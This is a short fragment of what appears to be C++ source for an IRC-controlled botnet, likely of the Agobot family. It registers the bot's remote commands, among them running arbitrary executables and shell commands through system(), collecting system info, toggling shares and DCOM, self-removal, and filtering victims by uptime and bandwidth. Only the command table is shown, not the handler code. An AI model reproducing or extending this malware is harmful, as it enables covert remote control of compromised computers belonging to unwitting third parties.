REGCMD(m_cmdAbout,        "bot.about",        "displays the info the author wants you to see", false, this);
REGCMD(m_cmdDie,          "bot.die",          "terminates the bot",                            false, this);
REGCMD(m_cmdDns,          "bot.dns",          "resolves ip/hostname by dns",                   false, this);
REGCMD(m_cmdExecute,      "bot.execute",      "makes the bot execute a .exe",                  false, this);
REGCMD(m_cmdId,           "bot.id",           "displays the id of the current code",           false, this);
REGCMD(m_cmdNick,         "bot.nick",         "changes the nickname of the bot",               false, this);
REGCMD(m_cmdOpen,         "bot.open",         "opens a file (whatever)",                       false, this);
REGCMD(m_cmdRemove,       "bot.remove",       "removes the bot",                               false, this);
REGCMD(m_cmdRemoveAllBut, "bot.removeallbut", "removes the bot if id does not match",          false, this);
REGCMD(m_cmdRndNick,      "bot.rndnick",      "makes the bot generate a new random nick",      false, this);
REGCMD(m_cmdStatus,       "bot.status",       "gives status",                                  false, this);
REGCMD(m_cmdSysInfo,      "bot.sysinfo",      "displays the system info",                      false, this);
REGCMD(m_cmdLongUptime,   "bot.longuptime",   "If uptime > 7 days then bot will respond",      false, this);
REGCMD(m_cmdHighSpeed,    "bot.highspeed",    "If speed > 5000 then bot will respond",         false, this);
REGCMD(m_cmdQuit,         "bot.quit",         "quits the bot",                                 false, this);
REGCMD(m_cmdFlushDNS,     "bot.flushdns",     "flushes the bots dns cache",                    false, this);
REGCMD(m_cmdSecure,       "bot.secure",       "delete shares / disable dcom",                  false, this);
REGCMD(m_cmdUnSecure,     "bot.unsecure",     "enable shares / enable dcom",                   false, this);
REGCMD(m_cmdCommand,      "bot.command",      "runs a command with system()",                  false, this);
